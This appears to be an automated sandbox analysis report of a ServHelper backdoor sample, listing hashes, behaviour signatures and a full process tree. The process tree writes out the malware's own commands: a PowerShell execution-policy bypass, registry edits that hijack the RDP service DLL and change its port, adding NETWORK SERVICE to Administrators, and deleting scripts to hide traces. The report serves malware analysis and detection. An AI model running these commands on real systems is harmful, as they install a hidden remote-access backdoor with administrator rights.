Analysis
- max time kernel: 87s
- max time network: 150s
- platform: windows10_x64
- resource: win10-en
- submitted: 10-09-2021 15:37

Static task: static1
Behavioral task: behavioral1
Sample: 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
Resource: win10-en

General
- Target: 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
- Size: 4.0MB
- MD5: 9cadcadb612787dc6c2e9901ffe49dec
- SHA1: dfaeffadd7767ea23cabc31a59ae2cd461abf00f
- SHA256: 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb
- SHA512: e7d908a73e85965359169b9d3e14ec3f1f81218354aa09a8d6c027be230e30c4f334122b933579ce6ad35e5eaffc01c6d8124e5f1a11671b7f6b36549d55beff
Malware Config
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- Drops file in System32 directory (1 IoC)
  Processes (description / ioc / process):
  File created: C:\Windows\SysWOW64\rdpclip.exe (powershell.exe)
- Drops file in Windows directory (8 IoCs)
  Processes (description / ioc / process):
  File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  Processes (pid / process):
  4796 powershell.exe
  4796 powershell.exe
  4796 powershell.exe
  1836 powershell.exe
  1836 powershell.exe
  1836 powershell.exe
  3336 powershell.exe
  3336 powershell.exe
  3336 powershell.exe
  2652 powershell.exe
  2652 powershell.exe
  2652 powershell.exe
  4796 powershell.exe
  4796 powershell.exe
  4796 powershell.exe
- Suspicious behavior: LoadsDriver (1 IoC)
  Processes (pid / process):
  620
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description / pid / process):
  Token: SeDebugPrivilege, 4796 powershell.exe
  Token: SeDebugPrivilege, 1836 powershell.exe
  Token: SeDebugPrivilege, 3336 powershell.exe
  Token: SeDebugPrivilege, 2652 powershell.exe
- Suspicious use of WriteProcessMemory (63 IoCs)
  Processes (description / pid / process / target process); every entry below is recorded three times in the report:
  PID 4684 wrote to memory of 4796: 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe -> powershell.exe (x3)
  PID 4796 wrote to memory of 4984: powershell.exe -> csc.exe (x3)
  PID 4984 wrote to memory of 5012: csc.exe -> cvtres.exe (x3)
  PID 4796 wrote to memory of 1836: powershell.exe -> powershell.exe (x3)
  PID 4796 wrote to memory of 3336: powershell.exe -> powershell.exe (x3)
  PID 4796 wrote to memory of 2652: powershell.exe -> powershell.exe (x3)
  PID 4796 wrote to memory of 4440: powershell.exe -> reg.exe (x3)
  PID 4796 wrote to memory of 3056: powershell.exe -> reg.exe (x3)
  PID 4796 wrote to memory of 4220: powershell.exe -> reg.exe (x3)
  PID 4796 wrote to memory of 4596: powershell.exe -> net.exe (x3)
  PID 4596 wrote to memory of 2824: net.exe -> net1.exe (x3)
  PID 4796 wrote to memory of 2628: powershell.exe -> cmd.exe (x3)
  PID 2628 wrote to memory of 4136: cmd.exe -> cmd.exe (x3)
  PID 4136 wrote to memory of 3636: cmd.exe -> net.exe (x3)
  PID 3636 wrote to memory of 648: net.exe -> net1.exe (x3)
  PID 4796 wrote to memory of 1016: powershell.exe -> cmd.exe (x3)
  PID 1016 wrote to memory of 4636: cmd.exe -> cmd.exe (x3)
  PID 4636 wrote to memory of 4376: cmd.exe -> net.exe (x3)
  PID 4376 wrote to memory of 3932: net.exe -> net1.exe (x3)
  PID 4796 wrote to memory of 5032: powershell.exe -> cmd.exe (x3)
  PID 4796 wrote to memory of 5036: powershell.exe -> cmd.exe (x3)
Processes (indented by process-tree level)
- C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe (level 1, PID 4684)
  Command line: "C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2, PID 4796)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (level 3, PID 4984)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rlmeisxk\rlmeisxk.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (level 4, PID 5012)
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7F7.tmp" "c:\Users\Admin\AppData\Local\Temp\rlmeisxk\CSC4A66E73C306D4AD9B2C12ABD8513448.TMP"
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3, PID 1836)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3, PID 3336)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3, PID 2652)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\reg.exe (level 3, PID 4440)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\SysWOW64\reg.exe (level 3, PID 3056)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\SysWOW64\reg.exe (level 3, PID 4220)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\SysWOW64\net.exe (level 3, PID 4596)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (level 4, PID 2824)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\SysWOW64\cmd.exe (level 3, PID 2628)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (level 4, PID 4136)
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (level 5, PID 3636)
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\net1.exe (level 6, PID 648)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\SysWOW64\cmd.exe (level 3, PID 1016)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (level 4, PID 4636)
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\net.exe (level 5, PID 4376)
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\net1.exe (level 6, PID 3932)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\SysWOW64\cmd.exe (level 3, PID 5032)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\SysWOW64\cmd.exe (level 3, PID 5036)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
MITRE ATT&CK Enterprise v6
Downloads